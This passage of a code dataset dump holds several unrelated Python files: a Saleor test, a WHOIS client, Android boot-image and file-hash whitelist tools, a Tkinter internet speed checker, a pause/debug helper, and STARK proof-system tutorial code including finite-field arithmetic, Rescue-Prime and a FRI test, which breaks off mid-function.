metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "3etechinns/saleor",
"score": 3
} |
#### File: saleor/tests/test_collection.py
```python
from django.urls import reverse
from .utils import get_redirect_location
def test_collection_index(client, collection):
url_kwargs = {'pk': collection.id, 'slug': collection.slug}
url = reverse('product:collection', kwargs=url_kwargs)
response = client.get(url)
assert response.status_code == 200
def test_collection_incorrect_slug(client, collection):
"""When entered on the collection with proper PK but incorrect slug,
one should be permanently(301) redirected to the proper url.
"""
url_kwargs = {'pk': collection.id, 'slug': 'incorrect-slug'}
url = reverse('product:collection', kwargs=url_kwargs)
response = client.get(url)
# User should be redirected to the proper url
assert response.status_code == 301
redirected_url = get_redirect_location(response)
proper_kwargs = {'pk': collection.id, 'slug': collection.slug}
proper_url = reverse('product:collection', kwargs=proper_kwargs)
assert redirected_url == proper_url
def test_collection_not_exists(client):
url_kwargs = {'pk': 123456, 'slug': 'incorrect-slug'}
url = reverse('product:collection', kwargs=url_kwargs)
response = client.get(url)
assert response.status_code == 404
``` |
{
"source": "3ev0/dns-monitor",
"score": 2
} |
#### File: dns-monitor/dnsmon/whois.py
```python
__author__ = '3ev0'
"""
Whois library.
See RFC 3912
https://www.icann.org/resources/pages/approved-with-specs-2013-09-17-en#whois
We parse the key/value pairs as-is and do not try to transform to a uniformish format. This should be good enough.
How to deal with domain intermediaries? This is, afaik, limited to .com, .edu and .net domains.
For these domains we do a second referal to get the more detailed whois data.
"""
import re
import logging
import socket
import threading
import datetime
import time
from . import libnet
_log = logging.getLogger(__name__)
_lock = threading.Lock()
_auth_wserver_cache = {}
_whois_root = "whois.iana.org"
_last_queried = {}
_last_queried_lock = threading.RLock()
_config = {"min_query_interval": 0.5}
def configure(**kwargs):
_config.update(kwargs)
_log.info("Module configured: %s", _config)
def repr_records(whoisdata):
lines = []
for record in whoisdata:
for k in sorted(record):
values = record[k].split("\n")
for val in values:
lines.append("{}: {}".format(k, val))
lines.append("")
return "\n".join(lines)
def domain_lookup(domain, wserver=None, raw=False):
if not libnet.is_domain(domain):
raise ValueError("%s is not a valid domain", domain)
if len(domain.strip(".").split(".")) is 1:
tld = domain.split(".")[-1]
whoisdata = _talk_whois(_whois_root, "."+tld)
else:
if not wserver:
wserver = _get_auth_wserver_domain(domain)
whoisdata = _talk_whois(wserver, domain)
if raw:
return whoisdata
else:
return _parse_whois_response(whoisdata)
def lookup(querystr, wserver=None, raw=False):
if libnet.is_domain(querystr):
return domain_lookup(querystr, wserver, raw)
elif libnet.is_ipaddr(querystr):
return ip_lookup(querystr, wserver, raw)
elif libnet.is_asnum(querystr):
return ip_lookup(querystr, wserver, raw)
else:
raise ValueError(querystr, "Should be domain, ip or asnum")
pass
def ip_lookup(querystr, wserver=None, raw=False):
if not libnet.is_ipaddr(querystr) and not libnet.is_asnum(querystr):
raise ValueError("%s is not a valid IP-address or ASnum", querystr)
if not wserver:
wserver = _get_auth_wserver(querystr)
if wserver == "whois.arin.net": # ofcourse, the yanks need some special switches
querystr = "+ " + querystr
elif wserver == "whois.ripe.net": # no special query needed
pass
elif wserver == "whois.apnic.net": # no special query needed
pass
elif wserver == "whois.afrinic.net": # no special query needed
pass
elif wserver == "whois.lacnic.net": # no special query needed
pass
if raw:
return _talk_whois(wserver, querystr)
else:
return _parse_whois_response(_talk_whois(wserver, querystr))
def _parse_whois_response(response):
"""
Dealing with the many many different interpretations of the whois response format.
If an empty line is encountered, start a new record
If a line with a semicolon is encountered, treat everything before first : as key and start a value
If a line without semicolon is encountered when value is started, add it to current value.
If a line without semicolon is encountered before value is started, skip it.
:param response: the raw response to parse
:return:a list of records containg (key, value) tuples
"""
newkvre = re.compile("^(\s*)([^\>\%\s][^:]+):(\s*(.*))?$")
commre = re.compile("^\s*[\%\>\@\;].*$")
records = []
currecord, curkey = {}, None
comment = False
for line in response.splitlines():
if line.strip() is "":
comment = False
if len(currecord):
records.append(currecord)
currecord, curkey = {}, None
continue
if comment:
continue
match = newkvre.match(line)
matchcomm = commre.match(line)
if match and matchcomm is None:
curkey = match.group(2)
val = match.group(4) if match.group(4) else ""
if curkey in currecord:
currecord[curkey] += "\n" + val
else:
currecord[curkey] = val
elif matchcomm: # part of comments
comment = True
continue
elif match is None and curkey: # this is likely part of multiline value
currecord[curkey] += "\n" + line.strip()
else:
comment = True
continue # this is likely start of comments
if len(currecord):
records.append(currecord)
_log.debug("Response parsed succesfully. %d records", len(records))
return records
def _talk_whois(wserver, querystr):
_delay(wserver)
sock = socket.create_connection((wserver, 43))
_log.debug("Connected to %s", wserver)
queryblob = bytes(querystr + "\r\n", encoding="utf8", errors="replace")
msglen = len(querystr)
totalsent = 0
while totalsent < msglen:
sent = sock.send(queryblob[totalsent:])
totalsent += sent
_log.debug("Request sent: %s", querystr)
chunks = []
chunk = sock.recv(4096)
chunks.append(chunk)
while len(chunk) > 0:
chunk = sock.recv(4096)
chunks.append(chunk)
response = str(b"".join(chunks), encoding="utf8", errors="replace")
_log.debug("Response received:\n%s", response)
return response
def _get_cached_wserver(key):
with _lock:
wserver = _auth_wserver_cache.get(key, None)
if wserver:
_log.debug("Cache hit on %s: %s", key, wserver)
else:
_log.debug("Cache miss on %s", key)
return wserver
def _cache_wserver(domain, wserver):
with _lock:
_auth_wserver_cache[domain] = wserver
def _get_auth_wserver_domain(domain):
"""
Return the authorative whois server for the domain. It queries the global iana whois server and finds the referal
whois server for the TLD of this domain
:param domain: The domain for which the whois server should be found
:return:the domain name of the whois server for this domain
"""
tld = domain.split(".")[-1]
_log.debug("looking up authorative wserver for %s (tld: %s)", domain, tld)
auth_wserver = _get_cached_wserver(tld)
if not auth_wserver:
respdata = _parse_whois_response(_talk_whois(_whois_root, "."+tld))
for record in respdata:
if "whois" in record:
auth_wserver = record["whois"]
_cache_wserver(tld, auth_wserver)
break
if not auth_wserver:
_log.error("Could not determine auth whois server for %s", domain)
raise Exception("Could not determine auth whois server for {}".format(domain))
# Special case. There is a second tier authorative server for .com .edu and .net
if auth_wserver == "whois.verisign-grs.com":
_log.debug("Looking up intermediary authorative wserver for %s", domain)
respdata = _parse_whois_response(_talk_whois(auth_wserver, "=" + domain))
for record in respdata:
if "Domain Name" in record:
auth_wserver = record["Whois Server"]
break
_log.debug("Found authorative whois server: %s", auth_wserver)
return auth_wserver
def _get_auth_wserver(querystr):
"""
Return the authorative whois server for this request. It queries the global iana whois server and finds the referal
whois server for the query.
:param querystr: The IP or ASnum for which the whois server should be found
:return:the address of the whois server for this query string
"""
_log.debug("looking up authorative wserver for %s", querystr)
auth_wserver = _get_cached_wserver(querystr)
if auth_wserver:
return auth_wserver
respdata = _parse_whois_response(_talk_whois(_whois_root, querystr))
try:
auth_wserver = respdata[0]["refer"]
except (KeyError, IndexError) as e:
auth_wserver = None
if not auth_wserver:
_log.error("Could not determine auth whois server for %s", querystr)
raise Exception("Could not determine auth whois server for {}".format(querystr))
_cache_wserver(querystr, auth_wserver)
_log.debug("Found authorative whois server: %s", auth_wserver)
return auth_wserver
def _delay(wserver):
"""
This forces threads to delay a preconfigured interval before querying the specified whois server again.
The thread that holds the wserver lock does not release until at least interval seconds have passed since last release.
:param wserver: The wserver for which the thread should delay
:return:
"""
with _last_queried_lock:
if wserver not in _last_queried:
_last_queried[wserver] = [threading.RLock(), 0]
with _last_queried[wserver][0]:
interval = datetime.datetime.now().timestamp() - _last_queried[wserver][1]
sleep_time = _config["min_query_interval"] - interval
if sleep_time > 0:
_log.debug("%s Delaying to query %s: %f seconds...", threading.current_thread().name, wserver, sleep_time)
time.sleep(sleep_time)
_last_queried[wserver][1] = datetime.datetime.now().timestamp()
``` |
{
"source": "3ev0/toolshed",
"score": 3
} |
#### File: toolshed/android/bootimg.py
```python
__author__ = 'ivo'
import struct
import io
import logging
import gzip
import subprocess
import os.path
import os
import tempfile
_log = logging.getLogger(__name__)
class BootImgHeader():
_struct = "<8sIIIIIIII4x4x16s512s32s1024s"
structlen = struct.calcsize(_struct)
@classmethod
def fromBytes(cls, blob):
bih = cls()
(bih.magic, bih.kernel_size, bih.kernel_addr,
bih.ramdisk_size, bih.ramdisk_addr, bih.second_size,
bih.second_addr, bih.tags_addr, bih.page_size,
bih.name, bih.cmdline, bih.id, bih.extra_cmdline) = struct.unpack_from(cls._struct, blob)
return bih
@classmethod
def fromFile(cls, fh):
return cls.fromBytes(fh.read(cls.structlen))
def __repr__(self):
return "<{}({})>".format(self.__class__.__name__, vars(self))
def _extract_kernel(fh):
hdr = BootImgHeader.fromFile(fh)
fh.seek(hdr.page_size - BootImgHeader.structlen, io.SEEK_CUR)
kernel_blob = fh.read(hdr.kernel_size)
return kernel_blob
def extract_kernel(fh):
if isinstance(fh, str):
with open(fh, "rb") as fh:
return _extract_kernel(fh)
else:
return _extract_kernel(fh)
def _extract_ramdisk(fh):
hdr = BootImgHeader.fromFile(fh)
fh.seek(hdr.page_size - BootImgHeader.structlen, io.SEEK_CUR)
fh.seek(hdr.kernel_size, io.SEEK_CUR)
fh.seek(hdr.page_size - (hdr.kernel_size % hdr.page_size), io.SEEK_CUR)
ramdisk_blob = fh.read(hdr.ramdisk_size)
return ramdisk_blob
def extract_ramdisk(fh):
if isinstance(fh, str):
with open(fh, "rb") as fh:
return _extract_ramdisk(fh)
else:
return _extract_ramdisk(fh)
def unpack_ramdisk(blob, destdir):
extractdir = os.path.join(destdir, "ramdisk_unpacked")
if not os.path.exists(extractdir):
os.mkdir(extractdir)
_log.info("Unpacking ramdisk to %s...", extractdir)
tfh = tempfile.TemporaryFile()
with gzip.open(io.BytesIO(blob), "rb") as gfh:
tfh.write(gfh.read())
tfh.seek(0)
subprocess.check_call(["cpio", "-i", "--no-absolute-filenames"], stdin=tfh, cwd=extractdir)
return extractdir
```
#### File: toolshed/android/build_whitelist.py
```python
import logging
import argparse
import os
import os.path
import subprocess
import hashlib
import json
import shutil
import stat
import plyvel
from android import filesystem
from android import simg2img
TRUST_LEVELS = {"high":2, # Known good source
"medium":1, # Source probably good, but not verified
"low":0} # Source trust unknown
THREAT_LEVELS = {"good":0,
"evil":1}
_log = logging.getLogger()
_tempdir = "/tmp"
_config = {"tempdir":"/tmp",
"dbpath": "hashes.db",
"dbif": None
}
def configure(**kwargs):
_config.update(**kwargs)
def _update_value(curval, value):
newval = {"filepath":value["filepath"],
"source_id":value["source_id"],
"threat":value["threat"],
"trust":value["trust"]
}
return newval
def batch_write(items, replace=True):
_log.debug("Batch write of %d items to %s", len(items), repr(_config["dbif"]))
num_added, num_procd, dupl = 0, 0, 0
with _config["dbif"].write_batch() as wb:
for hashes,value in items:
for hash in hashes:
num_procd += 1
curval = _config["dbif"].get(hash)
if curval:
_log.info("%s allready present in db", repr(hash))
dupl += 1
if not replace:
_log.info("not added")
continue
else:
newval = _update_value(json.loads(str(curval, encoding="utf8")), value)
wb.put(hash, bytes(json.dumps(newval), encoding="utf8"))
num_added += 1
_log.info("Replaced with %s", newval)
else:
wb.put(hash, bytes(json.dumps(value), encoding="utf8"))
_log.debug("%s added to database", repr(hash))
return num_added, num_procd, dupl
def hash_file(filepath):
_log.debug("Hashing %s", filepath)
with open(filepath, mode="br") as fh:
mmd5 = hashlib.md5()
msha1 = hashlib.sha1()
msha256 = hashlib.sha256()
blob = fh.read(1024*1024)
while blob:
mmd5.update(blob)
msha1.update(blob)
msha256.update(blob)
blob = fh.read(1024*1024)
return mmd5.digest(), msha1.digest(), msha256.digest()
def explore_filesystem(rootpath, sourceid=None, threat=None, trust=None):
dbif = _config["dbif"]
_log.info("Exploring from root %s...", rootpath)
batch_size = 1024
batch = []
total_added, total_procd, total_dupl = 0, 0, 0
for (root, dirs, files) in os.walk(rootpath, followlinks=False):
for fl in files:
fp = os.path.join(root, fl)
_log.info("Encountered file %s", fp)
if stat.S_ISLNK(os.lstat(fp).st_mode):
_log.info("Is symlink, so skipped")
continue
hashes = hash_file(fp)
batch.append((hashes, {"source_id": sourceid,
"threat":threat,
"trust":trust,
"filepath":fp}))
if len(batch) >= batch_size:
added, procd, dupl = batch_write(batch)
total_added, total_procd, total_dupl = total_added + added, total_procd + procd, total_dupl + dupl
batch = []
added, procd, dupl = batch_write(batch)
total_added, total_procd, total_dupl = total_added + added, total_procd + procd, total_dupl + dupl
_log.info("Done exploring!")
_log.info("%d records processed", total_procd)
_log.info("%d records allready in db", total_dupl)
dbif.close()
def main():
parser = argparse.ArgumentParser(description="Build hash list from images files or dirs")
parser.add_argument("source", help="Image file or dir")
parser.add_argument("-i", "--id", default="unknown", help="Provide source identifier to be stored with the hashes")
parser.add_argument("-t", "--threat", default="good", choices=list(THREAT_LEVELS.keys()), help="The threat level of these files")
parser.add_argument("-r", "--trust", default="high", choices=list(TRUST_LEVELS.keys()), help="The trust level of these files")
parser.add_argument("-d", "--debug", action="store_true", help="Enable debugging")
parser.add_argument("-o", "--output", default="hashes.db", help="The output database. If existing, the data is added. Default: hashes.db")
parser.add_argument("-f", "--format", choices=["ldb", "sql"], default="ldb", help="The output format. Default: ldb")
args = parser.parse_args()
logging.basicConfig(level=logging.DEBUG if args.debug else logging.INFO)
global _log
_config["dbpath"] = args.output
dbcreated = False
if args.format == "ldb":
if not os.path.exists(_config["dbpath"]):
dbcreated = True
_config["dbif"] = plyvel.DB(_config["dbpath"], create_if_missing=True)
_log.info("Connected to Ldb database %s", repr(_config["dbif"]))
else:
raise Exception("db format not implemented")
source = os.path.abspath(args.source)
_log.info("New source: %s...", source)
tempdir, mounted = False, False
if not os.path.exists(source):
_log.error("Path does not exist")
if os.path.isfile(source):
if filesystem.is_sparseext4(source):
_log.info("Smells like sparse ext4 image")
curfp = source
source = os.path.join(os.path.dirname(source), "unsparsed." + os.path.basename(source))
with open(curfp, "rb") as infd, open(source, "wb") as outfd:
simg2img.unsparse(infd, outfd)
if filesystem.is_yaffs_image(source):
_log.info("Smells like yaffs image")
rootpath = filesystem.unpack_yaffs(source)
else:
_log.info("Doesn't smell familier, i'll try to mount")
rootpath = filesystem.mount_image(source)
mounted = True
tempdir = True
else:
_log.info("assuming this the root of file tree")
rootpath = source
explore_filesystem(rootpath, sourceid=args.id, threat=args.threat, trust=args.trust)
# In case this script is run as sudo because of mounting, we want to change the owner to actual user
if os.environ["SUDO_USER"] and dbcreated:
subprocess.check_call(["chown", "-R", "{}:{}".format(os.environ["SUDO_UID"], os.environ["SUDO_GID"]), _config["dbpath"]])
_log.info("Owner of %s set to %s:%s", _config["dbpath"],os.environ["SUDO_UID"], os.environ["SUDO_GID"])
if mounted:
mounting.unmount_image(rootpath)
if tempdir:
shutil.rmtree(rootpath)
_log.info("Temp dir %s deleted", rootpath)
if __name__ == "__main__":
main()
``` |
{
"source": "3eyedraven/SpeedO",
"score": 3
} |
#### File: 3eyedraven/SpeedO/speedO.py
```python
from tkinter import *
from speedtest import Speedtest
root = Tk()
root.title("SpeedO by threeeyedraven")
root.geometry('380x400')
root.resizable(False, False)
bg_image = PhotoImage(file='./speed.png')
bg = Label(image=bg_image).grid(row=0, column=0, padx=100, pady=5)
def get_speed():
s = Speedtest()
download = s.download()
upload = s.upload()
download_speed = round(download / (10 ** 6), 2)
upload_speed = round(upload / (10 ** 6), 2)
down_lab.config(text='Download speed is: ' + str(download_speed) + "Mbps")
upload_lab.config(text='Upload speed is: ' + str(upload_speed) + "Mbps")
fg = '#0cc6a9'
bg = '#ed4947'
Button(root, text='Get Speed', font=('Ariel', 10, 'bold'), command=get_speed, bg=bg).grid(row=1, column=0, padx=5,
pady=10)
down_lab = Label(root, text='', fg=fg, font=('Helvetica', 10, 'bold'))
down_lab.grid(row=2, column=0, padx=5, pady=5)
upload_lab = Label(root, text='', fg=fg, font=('Helvetica', 10, 'bold'))
upload_lab.grid(row=3, column=0, padx=5, pady=5)
root.mainloop()
``` |
{
"source": "3fon3fonov/python",
"score": 3
} |
#### File: 3fon3fonov/python/pause.py
```python
from __future__ import print_function
__author__ = '<NAME>'
__version__ = '2018-08-30'
import inspect
import pdb
import sys
import termios
def getch():
"""
Read immediately a character without enter.
Example
-------
>>> print 'char:',; ch = getch(); print 'nextline'
"""
old_settings = termios.tcgetattr(0)
new_settings = old_settings[:]
new_settings[3] &= ~termios.ICANON #& ~termios.ECHO
try:
termios.tcsetattr(0, termios.TCSANOW, new_settings)
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(0, termios.TCSANOW, old_settings)
return ch
def pause(*args, **kwargs):
"""
Set a pause at the current location in the script.
Pause waits for a character. If the character is a 'd' (debug), 's' (step)
or 'n' (next), it enters python debug mode.
If it is a 'q', it quits the program. An enter or any other characters
continues.
Parameters
----------
args : optional
Arguments to print.
ch : optional
A character can be passed, otherwise it prompts for it.
depth : optional
Stack level where to pause (default=0).
Example
-------
>>> from pause import pause
>>> def func_a():
... a = 2
... pause()
... b = 3
... pause()
>>>
>>> func_a()
"""
#lineno = inspect.currentframe().f_back.f_lineno
depth = 1 + kwargs.get('depth', 0) # we want to stop in the caller
prompt = kwargs.get('depth', 'pause') # we want to stop in the caller
_, filename, lineno, _,_,_ = inspect.stack()[depth]
print(prompt, filename, 'line %s: ' % lineno, *args, end='')
sys.stdout.flush()
ch = kwargs.get('ch')
if not ch:
ch = getch() # all shells?
#ch = sys.stdin.readline() # requires manual enter
#ch = os.popen('read -s -n 1 -p "'+prompt+'" ch; echo $ch').read() # only bash?
#print ch.rstrip() # print single char (and remove newline)
if ch != '\n':
print()
if ch == 'q':
exit()
elif ch in ('d', 'n', 's'):
print("debug mode; type 'c' to continue")
if 1:
# a workaround for bad arrow keys and history behaviour
print('mode d: logging turned off, stdout reseted')
sys.stdout = sys.__stdout__
x = pdb.Pdb(skip=['pause'])
#x.prompt = 'Bla '
# x.rcLines=["print 'aa'"]; x.setup(sys._getframe().f_back,None)
# x.set_trace(sys._getframe().f_back) # debug
x.set_trace(sys._getframe(depth)) # debug
return ch
def stop(*args):
pause(*args, prompt='stop', ch='d', depth=1)
``` |
{
"source": "3for/stark-anatomy",
"score": 3
} |
#### File: stark-anatomy/code/algebra.py
```python
def xgcd( x, y ):
old_r, r = (x, y)
old_s, s = (1, 0)
old_t, t = (0, 1)
while r != 0:
quotient = old_r // r
old_r, r = (r, old_r - quotient * r)
old_s, s = (s, old_s - quotient * s)
old_t, t = (t, old_t - quotient * t)
return old_s, old_t, old_r # a, b, g
class FieldElement:
def __init__( self, value, field ):
self.value = value
self.field = field
def __add__( self, right ):
return self.field.add(self, right)
def __mul__( self, right ):
return self.field.multiply(self, right)
def __sub__( self, right ):
return self.field.subtract(self, right)
def __truediv__( self, right ):
return self.field.divide(self, right)
def __neg__( self ):
return self.field.negate(self)
def inverse( self ):
return self.field.inverse(self)
# modular exponentiation -- be sure to encapsulate in parentheses!
def __xor__( self, exponent ):
acc = FieldElement(1, self.field)
val = FieldElement(self.value, self.field)
for i in reversed(range(len(bin(exponent)[2:]))):
acc = acc * acc
if (1 << i) & exponent != 0:
acc = acc * val
return acc
def __eq__( self, other ):
return self.value == other.value
def __neq__( self, other ):
return self.value != other.value
def __str__( self ):
return str(self.value)
def __bytes__( self ):
return bytes(str(self).encode())
def is_zero( self ):
if self.value == 0:
return True
else:
return False
class Field:
def __init__( self, p ):
self.p = p
def zero( self ):
return FieldElement(0, self)
def one( self ):
return FieldElement(1, self)
def multiply( self, left, right ):
return FieldElement((left.value * right.value) % self.p, self)
def add( self, left, right ):
return FieldElement((left.value + right.value) % self.p, self)
def subtract( self, left, right ):
return FieldElement((self.p + left.value - right.value) % self.p, self)
def negate( self, operand ):
return FieldElement((self.p - operand.value) % self.p, self)
def inverse( self, operand ):
a, b, g = xgcd(operand.value, self.p)
return FieldElement(((a % self.p) + self.p) % self.p, self)
def divide( self, left, right ):
assert(not right.is_zero()), "divide by zero"
a, b, g = xgcd(right.value, self.p)
return FieldElement(left.value * a % self.p, self)
def main():
p = 1 + 407 * ( 1 << 119 ) # 1 + 11 * 37 * 2^119
return Field(p)
def generator( self ):
assert(self.p == 1 + 407 * ( 1 << 119 )), "Do not know generator for other fields beyond 1+407*2^119"
return FieldElement(85408008396924667383611388730472331217, self)
def primitive_nth_root( self, n ):
if self.p == 1 + 407 * ( 1 << 119 ):
assert(n <= 1 << 119 and (n & (n-1)) == 0), "Field does not have nth root of unity where n > 2^119 or not power of two."
root = FieldElement(85408008396924667383611388730472331217, self)
order = 1 << 119
while order != n:
root = root^2
order = order/2
return root
else:
assert(False), "Unknown field, can't return root of unity."
def sample( self, byte_array ):
acc = 0
for b in byte_array:
acc = (acc << 8) ^ int(b)
return FieldElement(acc % self.p, self)
```
#### File: stark-anatomy/code/rescue_prime.py
```python
from algebra import *
from univariate import *
from multivariate import *
class RescuePrime:
def __init__( self ):
self.p = 407 * (1 << 119) + 1
self.field = Field(self.p)
self.m = 2
self.rate = 1
self.capacity = 1
self.N = 27
self.alpha = 3
self.alphainv = 180331931428153586757283157844700080811
self.MDS = [[FieldElement(v, self.field) for v in [270497897142230380135924736767050121214, 4]],
[FieldElement(v, self.field) for v in [270497897142230380135924736767050121205, 13]]]
self.MDSinv = [[FieldElement(v, self.field) for v in [210387253332845851216830350818816760948, 60110643809384528919094385948233360270]],
[FieldElement(v, self.field) for v in [90165965714076793378641578922350040407, 180331931428153586757283157844700080811]]]
self.round_constants = [FieldElement(v, self.field) for v in [174420698556543096520990950387834928928,
109797589356993153279775383318666383471,
228209559001143551442223248324541026000,
268065703411175077628483247596226793933,
250145786294793103303712876509736552288,
154077925986488943960463842753819802236,
204351119916823989032262966063401835731,
57645879694647124999765652767459586992,
102595110702094480597072290517349480965,
8547439040206095323896524760274454544,
50572190394727023982626065566525285390,
87212354645973284136664042673979287772,
64194686442324278631544434661927384193,
23568247650578792137833165499572533289,
264007385962234849237916966106429729444,
227358300354534643391164539784212796168,
179708233992972292788270914486717436725,
102544935062767739638603684272741145148,
65916940568893052493361867756647855734,
144640159807528060664543800548526463356,
58854991566939066418297427463486407598,
144030533171309201969715569323510469388,
264508722432906572066373216583268225708,
22822825100935314666408731317941213728,
33847779135505989201180138242500409760,
146019284593100673590036640208621384175,
51518045467620803302456472369449375741,
73980612169525564135758195254813968438,
31385101081646507577789564023348734881,
270440021758749482599657914695597186347,
185230877992845332344172234234093900282,
210581925261995303483700331833844461519,
233206235520000865382510460029939548462,
178264060478215643105832556466392228683,
69838834175855952450551936238929375468,
75130152423898813192534713014890860884,
59548275327570508231574439445023390415,
43940979610564284967906719248029560342,
95698099945510403318638730212513975543,
77477281413246683919638580088082585351,
206782304337497407273753387483545866988,
141354674678885463410629926929791411677,
19199940390616847185791261689448703536,
177613618019817222931832611307175416361,
267907751104005095811361156810067173120,
33296937002574626161968730356414562829,
63869971087730263431297345514089710163,
200481282361858638356211874793723910968,
69328322389827264175963301685224506573,
239701591437699235962505536113880102063,
17960711445525398132996203513667829940,
219475635972825920849300179026969104558,
230038611061931950901316413728344422823,
149446814906994196814403811767389273580,
25535582028106779796087284957910475912,
93289417880348777872263904150910422367,
4779480286211196984451238384230810357,
208762241641328369347598009494500117007,
34228805619823025763071411313049761059,
158261639460060679368122984607245246072,
65048656051037025727800046057154042857,
134082885477766198947293095565706395050,
23967684755547703714152865513907888630,
8509910504689758897218307536423349149,
232305018091414643115319608123377855094,
170072389454430682177687789261779760420,
62135161769871915508973643543011377095,
15206455074148527786017895403501783555,
201789266626211748844060539344508876901,
179184798347291033565902633932801007181,
9615415305648972863990712807943643216,
95833504353120759807903032286346974132,
181975981662825791627439958531194157276,
267590267548392311337348990085222348350,
49899900194200760923895805362651210299,
89154519171560176870922732825690870368,
265649728290587561988835145059696796797,
140583850659111280842212115981043548773,
266613908274746297875734026718148328473,
236645120614796645424209995934912005038,
265994065390091692951198742962775551587,
59082836245981276360468435361137847418,
26520064393601763202002257967586372271,
108781692876845940775123575518154991932,
138658034947980464912436420092172339656,
45127926643030464660360100330441456786,
210648707238405606524318597107528368459,
42375307814689058540930810881506327698,
237653383836912953043082350232373669114,
236638771475482562810484106048928039069,
168366677297979943348866069441526047857,
195301262267610361172900534545341678525,
2123819604855435621395010720102555908,
96986567016099155020743003059932893278,
248057324456138589201107100302767574618,
198550227406618432920989444844179399959,
177812676254201468976352471992022853250,
211374136170376198628213577084029234846,
105785712445518775732830634260671010540,
122179368175793934687780753063673096166,
126848216361173160497844444214866193172,
22264167580742653700039698161547403113,
234275908658634858929918842923795514466,
189409811294589697028796856023159619258,
75017033107075630953974011872571911999,
144945344860351075586575129489570116296,
261991152616933455169437121254310265934,
18450316039330448878816627264054416127]]
def hash( self, input_element ):
# absorb
state = [input_element] + [self.field.zero()] * (self.m - 1)
# permutation
for r in range(self.N):
# forward half-round
# S-box
for i in range(self.m):
state[i] = state[i]^self.alpha
# matrix
temp = [self.field.zero() for i in range(self.m)]
for i in range(self.m):
for j in range(self.m):
temp[i] = temp[i] + self.MDS[i][j] * state[j]
# constants
state = [temp[i] + self.round_constants[2*r*self.m+i] for i in range(self.m)]
# backward half-round
# S-box
for i in range(self.m):
state[i] = state[i]^self.alphainv
# matrix
temp = [self.field.zero() for i in range(self.m)]
for i in range(self.m):
for j in range(self.m):
temp[i] = temp[i] + self.MDS[i][j] * state[j]
# constants
state = [temp[i] + self.round_constants[2*r*self.m+self.m+i] for i in range(self.m)]
# squeeze
return state[0]
def trace( self, input_element ):
trace = []
# absorb
state = [input_element] + [self.field.zero()] * (self.m - 1)
# explicit copy to record state into trace
trace += [[s for s in state]]
# permutation
for r in range(self.N):
# forward half-round
# S-box
for i in range(self.m):
state[i] = state[i]^self.alpha
# matrix
temp = [self.field.zero() for i in range(self.m)]
for i in range(self.m):
for j in range(self.m):
temp[i] = temp[i] + self.MDS[i][j] * state[j]
# constants
state = [temp[i] + self.round_constants[2*r*self.m+i] for i in range(self.m)]
# backward half-round
# S-box
for i in range(self.m):
state[i] = state[i]^self.alphainv
# matrix
temp = [self.field.zero() for i in range(self.m)]
for i in range(self.m):
for j in range(self.m):
temp[i] = temp[i] + self.MDS[i][j] * state[j]
# constants
state = [temp[i] + self.round_constants[2*r*self.m+self.m+i] for i in range(self.m)]
# record state at this point, with explicit copy
trace += [[s for s in state]]
# squeeze
# output = state[0]
return trace
def boundary_constraints( self, output_element ):
constraints = []
# at start, capacity is zero
constraints += [(0, 1, self.field.zero())]
# at end, rate part is the given output element
constraints += [(self.N, 0, output_element)]
return constraints
def round_constants_polynomials( self, omicron ):
first_step_constants = []
for i in range(self.m):
domain = [omicron^r for r in range(0, self.N)]
values = [self.round_constants[2*r*self.m+i] for r in range(0, self.N)]
univariate = Polynomial.interpolate_domain(domain, values)
multivariate = MPolynomial.lift(univariate, 0)
first_step_constants += [multivariate]
second_step_constants = []
for i in range(self.m):
domain = [omicron^r for r in range(0, self.N)]
values = [self.field.zero()] * self.N
#for r in range(self.N):
# print("len(round_constants):", len(self.round_constants), " but grabbing index:", 2*r*self.m+self.m+i, "for r=", r, "for m=", self.m, "for i=", i)
# values[r] = self.round_constants[2*r*self.m + self.m + i]
values = [self.round_constants[2*r*self.m+self.m+i] for r in range(self.N)]
univariate = Polynomial.interpolate_domain(domain, values)
multivariate = MPolynomial.lift(univariate, 0)
second_step_constants += [multivariate]
return first_step_constants, second_step_constants
def transition_constraints( self, omicron ):
# get polynomials that interpolate through the round constants
first_step_constants, second_step_constants = self.round_constants_polynomials(omicron)
# arithmetize one round of Rescue-Prime
variables = MPolynomial.variables(1 + 2*self.m, self.field)
cycle_index = variables[0]
previous_state = variables[1:(1+self.m)]
next_state = variables[(1+self.m):(1+2*self.m)]
air = []
for i in range(self.m):
# compute left hand side symbolically
# lhs = sum(MPolynomial.constant(self.MDS[i][k]) * (previous_state[k]^self.alpha) for k in range(self.m)) + first_step_constants[i]
lhs = MPolynomial.constant(self.field.zero())
for k in range(self.m):
lhs = lhs + MPolynomial.constant(self.MDS[i][k]) * (previous_state[k]^self.alpha)
lhs = lhs + first_step_constants[i]
# compute right hand side symbolically
# rhs = sum(MPolynomial.constant(self.MDSinv[i][k]) * (next_state[k] - second_step_constants[k]) for k in range(self.m))^self.alpha
rhs = MPolynomial.constant(self.field.zero())
for k in range(self.m):
rhs = rhs + MPolynomial.constant(self.MDSinv[i][k]) * (next_state[k] - second_step_constants[k])
rhs = rhs^self.alpha
# equate left and right hand sides
air += [lhs-rhs]
return air
def randomizer_freedom( self, omicron, num_randomizers ):
domain = [omicron^i for i in range(self.N, self.N+num_randomizers)]
zerofier = Polynomial.zerofier_domain(domain)
multivariate_zerofier = MPolynomial.lift(zerofier, 0)
return multivariate_zerofier
```
#### File: stark-anatomy/code/test_fri.py
```python
from algebra import *
from fri import *
def test_fri( ):
field = Field.main()
degree = 63
expansion_factor = 4
num_colinearity_tests = 17
initial_codeword_length = (degree + 1) * expansion_factor
log_codeword_length = 0
codeword_length = initial_codeword_length
while codeword_length > 1:
codeword_length //= 2
log_codeword_length += 1
assert(1 << log_codeword_length == initial_codeword_length), "log not computed correctly"
omega = field.primitive_nth_root(initial_codeword_length)
generator = field.generator()
assert(omega^(1 << log_codeword_length) == field.one()), "omega not nth root of unity"
assert(omega^(1 << (log_codeword_length-1)) != field.one()), "omega not primitive"
fri = Fri(generator, omega, initial_codeword_length, expansion_factor, num_colinearity_tests)
polynomial = Polynomial([FieldElement(i, field) for i in range(degree+1)])
domain = [omega^i for i in range(initial_codeword_length)]
codeword = polynomial.evaluate_domain(domain)
# test valid codeword
print("testing valid codeword ...")
proof_stream = ProofStream()
fri.prove(codeword, proof_stream)
print("")
points = []
verdict = fri.verify(proof_stream, points)
if verdict == False:
print("rejecting proof, but proof should be valid!")
return
for (x,y) in points:
if polynomial.evaluate(omega^x) != y:
print("polynomial evaluates to wrong value")
assert(False)
print("success! \\o/")
# disturb then test for failure
print("testing invalid codeword ...")
